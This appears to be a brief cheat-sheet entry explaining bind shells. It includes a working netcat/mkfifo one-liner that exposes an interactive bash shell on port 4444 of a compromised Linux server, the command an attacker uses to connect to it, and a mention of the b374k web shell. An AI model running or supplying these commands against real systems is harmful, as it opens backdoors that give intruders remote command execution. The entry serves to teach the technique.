Bind shell ¶

A bind shell is similar to a reverse shell aside from the fact that the server, i.g. the one waiting for clients, is now the target, and the hacker is the one connecting to it.

It's a backdoor, as anyone connecting to it can run commands, and the shell will keep running even if the client leaves.

➡️ See also: b374k that may be used by sysadmins.

• For instance, on a Linux compromised server:

$ rm -f /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/bash -i 2>&1 | nc -l YOUR_IP 4444 > /tmp/f

• Then, the hacker can connect to it using:

$ nc -nv TARGET_SERVER_IP 4444